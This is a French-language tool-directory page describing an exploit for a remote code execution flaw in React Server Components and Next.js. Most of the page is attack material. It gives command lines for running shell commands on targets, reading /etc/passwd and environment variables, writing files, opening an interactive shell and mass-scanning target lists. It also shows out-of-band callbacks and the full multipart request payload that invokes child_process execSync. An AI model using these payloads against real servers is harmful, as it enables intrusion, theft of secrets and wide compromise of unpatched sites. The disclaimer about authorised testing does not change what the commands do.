Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-55182-Exploit-PoC-Scanner — Outil d'exploitation pour CVE-2025-55182 et CVE-2025-66478 dans React Server Components et Next.js, avec gadgets RCE, lecture/écriture de fichiers, rappels hors bande et shell interactif pour les tests de sécurité autorisés. | Kitploit
Outils/GitHubGitHub/zemarkhos/cve-2025-55182-exploit-poc-scanner
Scanners de VulnérabilitésAnalyse Dynamique (Sandboxing)ExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionCommandement et ContrôleApprentissage et ÉducationRed Teaming
Développement de Charges Utiles
GitHubzemarkhos/cve-2025-55182-exploit-poc-scanner

CVE-2025-55182-Exploit-PoC-Scanner

Outil d'exploitation pour CVE-2025-55182 et CVE-2025-66478 dans React Server Components et Next.js, avec gadgets RCE, lecture/écriture de fichiers, rappels hors bande et shell interactif pour les tests de sécurité autorisés.

Voir le dépôt
215il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-55182 - Exploit RCE des Composants Serveur React v2.0

Un outil complet de recherche en sécurité pour tester les vulnérabilités CVE-2025-55182 et CVE-2025-66478 dans les Composants Serveur React (RSC) et les Actions Serveur Next.js.

Aperçu de la vulnérabilité

PropriétéValeur
Identifiants CVECVE-2025-55182, CVE-2025-66478
Score CVSS10.0 (CRITIQUE)
Versions concernéesReact < 19.2.0, Next.js < 15.0.5
Type de vulnérabilitéExécution de code à distance (RCE)
Vecteur d'attaqueRéseau

Fonctionnalités

  • Scan de vulnérabilités de style PortSwigger avec plusieurs charges de détection
  • Plusieurs gadgets RCE (execSync, spawnSync, vm.runInThisContext, etc.)
  • Test de rappel hors bande (OOB) pour vérification RCE aveugle
  • Capacités de lecture/écriture de fichiers
  • Exécution de code JavaScript
  • Mode shell interactif
  • Scan en masse avec multi-threading
  • Support proxy (compatible Burp Suite)
  • Formats de sortie JSON/Texte

Installation

Prérequis

root@kitploit:~
pip install requests

Version Python

  • Python 3.7 ou supérieur

Démarrage rapide

root@kitploit:~
# Vérification de vulnérabilité de base
python3 exploit-custom.py -u https://target.com --check

# Scan de vulnérabilité complet (recommandé)
python3 exploit-custom.py -u https://target.com --scan

# Avec proxy (Burp Suite)
python3 exploit-custom.py -u https://target.com --scan -p http://127.0.0.1:8080

# Test de rappel OOB
python3 exploit-custom.py -u https://target.com --oob your-id.oastify.com

# Exécution de commande
python3 exploit-custom.py -u https://target.com --cmd "whoami"

# Shell interactif
python3 exploit-custom.py -u https://target.com --shell

Utilisation

Arguments en ligne de commande

root@kitploit:~
usage: exploit-custom.py [-h] (-u URL | -l URL_LIST) [-p PROXY] [-c COOKIES]
                         [-H HEADER] [-t THREADS] [--timeout TIMEOUT]
                         [--check] [--detect] [--scan] [--test-all]
                         [--oob HOST] [--cmd CMD] [--gadget GADGET]
                         [--read FILE] [--write FILE CONTENT] [--js JS]
                         [--shell] [-o OUTPUT] [-q]

Sélection de cible

ArgumentDescriptionExemple
-u, --urlURL cible unique-u https://target.com
-l, --listFichier contenant des URLs-l targets.txt

Modes de scan

ArgumentDescription
--detectDétecter l'utilisation de Next.js/RSC
--checkVérification rapide de vulnérabilité (test mathématique)
--scanScan de vulnérabilité complet (style PortSwigger)
--test-allTester tous les gadgets et charges de détection

Exploitation

ArgumentDescriptionExemple
--cmdExécuter une commande shell--cmd "id"
--gadgetSpécifier le gadget à utiliser--gadget execSync
--readLire un fichier sur la cible--read /etc/passwd
--writeÉcrire un fichier sur la cible--write /tmp/test.txt "contenu"
--jsExécuter du code JavaScript--js "process.env"
--shellDémarrer un shell interactif--shell
--oobHôte de rappel OOB--oob xyz.oastify.com

Options de connexion

ArgumentDescriptionExemple
-p, --proxyProxy HTTP/HTTPS-p http://127.0.0.1:8080
-c, --cookiesChaîne de cookies-c "session=abc123"
-H, --headerEn-tête supplémentaire (répétable)-H "X-Custom: value"
-t, --threadsNombre de threads pour le scan en masse-t 20
--timeoutDélai d'attente de requête en secondes--timeout 60

Options de sortie

ArgumentDescription
-o, --outputEnregistrer les résultats dans un fichier (.json ou .txt)
-q, --quietSupprimer la bannière

Exemples de scan

Cible unique

root@kitploit:~
# Détecter Next.js et RSC
python3 exploit-custom.py -u https://target.com --detect

# Vérification rapide de vulnérabilité
python3 exploit-custom.py -u https://target.com --check

# Scan complet avec toutes les charges de détection
python3 exploit-custom.py -u https://target.com --scan

# Tester tous les gadgets avec vérification OOB
python3 exploit-custom.py -u https://target.com --test-all --oob xyz.oastify.com

Scan en masse

root@kitploit:~
# Scanner plusieurs cibles
python3 exploit-custom.py -l targets.txt --scan -o results.json

# Avec un nombre de threads augmenté
python3 exploit-custom.py -l targets.txt --scan -t 20 -o results.json

# Avec rappels OOB
python3 exploit-custom.py -l targets.txt --oob xyz.oastify.com -o results.json

Exemples d'exploitation

Exécution de commande

root@kitploit:~
# Utilisation du gadget par défaut (execSync)
python3 exploit-custom.py -u https://target.com --cmd "whoami"

# Utilisation d'un gadget spécifique
python3 exploit-custom.py -u https://target.com --cmd "id" --gadget spawnSync
python3 exploit-custom.py -u https://target.com --cmd "cat /etc/passwd" --gadget execFileSync

Opérations sur les fichiers

root@kitploit:~
# Lire un fichier
python3 exploit-custom.py -u https://target.com --read /etc/passwd
python3 exploit-custom.py -u https://target.com --read /proc/self/environ

# Écrire un fichier
python3 exploit-custom.py -u https://target.com --write /tmp/pwned.txt "pwned"

Exécution JavaScript

root@kitploit:~
# Obtenir les variables d'environnement
python3 exploit-custom.py -u https://target.com --js "JSON.stringify(process.env)"

# Obtenir le nom d'hôte
python3 exploit-custom.py -u https://target.com --js "require('os').hostname()"

# Lister un répertoire
python3 exploit-custom.py -u https://target.com --js "require('fs').readdirSync('/')"

Shell interactif

root@kitploit:~
python3 exploit-custom.py -u https://target.com --shell

Commandes shell :

CommandeDescription
<commande>Exécuter une commande shell
!read <fichier>Lire un fichier
!write <fichier> <contenu>Écrire un fichier
!js <code>Exécuter du JavaScript
!gadget <nom>Changer de gadget
exitQuitter le shell

Gadgets disponibles

Gadgets RCE

NomID du moduleDescription
execSyncchild_process#execSyncExécution directe de commande shell
execFileSyncchild_process#execFileSyncExécuter un fichier binaire
spawnSyncchild_process#spawnSyncLancer un processus avec arguments
vm_runInThisContextvm#runInThisContextExécuter du JS dans le contexte actuel
vm_runInNewContextvm#runInNewContextExécuter du JS avec échappement de bac à sable
vm_runInThisContext_globalvm#runInThisContextExécuter via global.process

Gadgets fichiers

NomID du moduleDescription
fs_readFileSyncfs#readFileSyncLire des fichiers arbitraires
fs_writeFileSyncfs#writeFileSyncÉcrire des fichiers arbitraires

Gadgets OOB

NomDescription
vm_fetchRequête HTTP via l'API fetch (Node 18+)
vm_httpRequête HTTP via le module http

Charges de détection (CVE-2025-66478)

Le mode --scan utilise ces charges de détection de style PortSwigger :

ChargeDescription
property_referenceRéférence de propriété délimitée par deux-points ["$1:a:a"]
property_reference_v2Référence alternative ["$1:b:b"]
property_reference_constructorAccès au constructeur via référence de propriété
property_reference_protoAccès à la chaîne prototype via référence de propriété
action_ref_vmACTION_REF avec vm#runInThisContext
action_ref_execSyncACTION_REF avec child_process#execSync

Méthodes de rappel OOB

L'outil prend en charge plusieurs méthodes de rappel OOB :

MéthodeDescription
curlRequête HTTP via la commande curl
wgetRequête HTTP via la commande wget
nslookupRequête DNS
pingPing ICMP
fetchAPI fetch Node.js
httpModule http Node.js

Interprétation des résultats

Couleurs du terminal

CouleurStatutSignification
Vert[VULN]Vulnérable - RCE confirmée
Jaune[PATCH]Corrigé - Actions Serveur actives mais protégées
Bleu[RSC]Actions Serveur détectées
Cyan[NEXT]Next.js détecté
Rouge[ERR]Erreur de connexion

Résultats de scan

root@kitploit:~
[VULN] property_reference          Pattern vulnérable détecté !
        -> Error digest pattern: E{"digest"... (nécessite vérification OOB)
[SAFE] property_reference_v2       HTTP 200
[500]  action_ref_vm               digest:12345

Détails techniques

Format flight RSC

L'outil analyse les réponses au « format flight » des Composants Serveur React :

root@kitploit:~
0:{"a":"$@1","b":"$@2"}
1:E{"digest":"12345"}

Structure de charge multipart

root@kitploit:~
------CVE2025Boundary
Content-Disposition: form-data; name="$ACTION_REF_0"

------CVE2025Boundary
Content-Disposition: form-data; name="$ACTION_0:0"

{"id":"child_process#execSync","bound":["whoami"]}
------CVE2025Boundary--

En-têtes HTTP requis

root@kitploit:~
Content-Type: multipart/form-data; boundary=----CVE2025Boundary
Accept: text/x-component
Next-Action: <random-uuid>
RSC: 1
Next-Router-State-Tree: [[["",{"children":["__PAGE__",{}]},null,null,true]]

Versions corrigées

React

  • 19.0.1, 19.1.2, 19.2.1

Next.js

  • 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7

Cas d'utilisation

Bug Bounty

root@kitploit:~
# 1. Préparer la liste de cibles
echo "https://app.example.com" > targets.txt
echo "https://api.example.com" >> targets.txt

# 2. Scan en masse
python3 exploit-custom.py -l targets.txt --scan -o results.json

# 3. Vérifier avec OOB
python3 exploit-custom.py -u https://vuln.example.com --oob your-id.oastify.com

Tests d'intrusion

root@kitploit:~
# 1. Détecter la technologie
python3 exploit-custom.py -u https://target.com --detect

# 2. Analyser avec Burp
python3 exploit-custom.py -u https://target.com --scan -p http://127.0.0.1:8080

# 3. Exploiter
python3 exploit-custom.py -u https://target.com --shell

Références

  • Bulletin de sécurité Next.js - CVE-2025-66478
  • Recherche Wiz - CVE-2025-55182
  • Recherche PortSwigger

Avertissement légal

Cet outil est fourni uniquement pour les tests de sécurité autorisés et à des fins éducatives.

ATTENTION : L'accès non autorisé à des systèmes informatiques est illégal. N'utilisez cet outil que sur des systèmes dont vous êtes propriétaire ou pour lesquels vous avez une autorisation écrite explicite de test.

Les auteurs ne sont pas responsables de toute utilisation abusive ou des dommages causés par cet outil.

Licence

Cet outil est publié à des fins de recherche en sécurité et de tests d'intrusion autorisés.


Auteur : Ünsal Furkan Harani Version : 2.0

Télécharger l’outil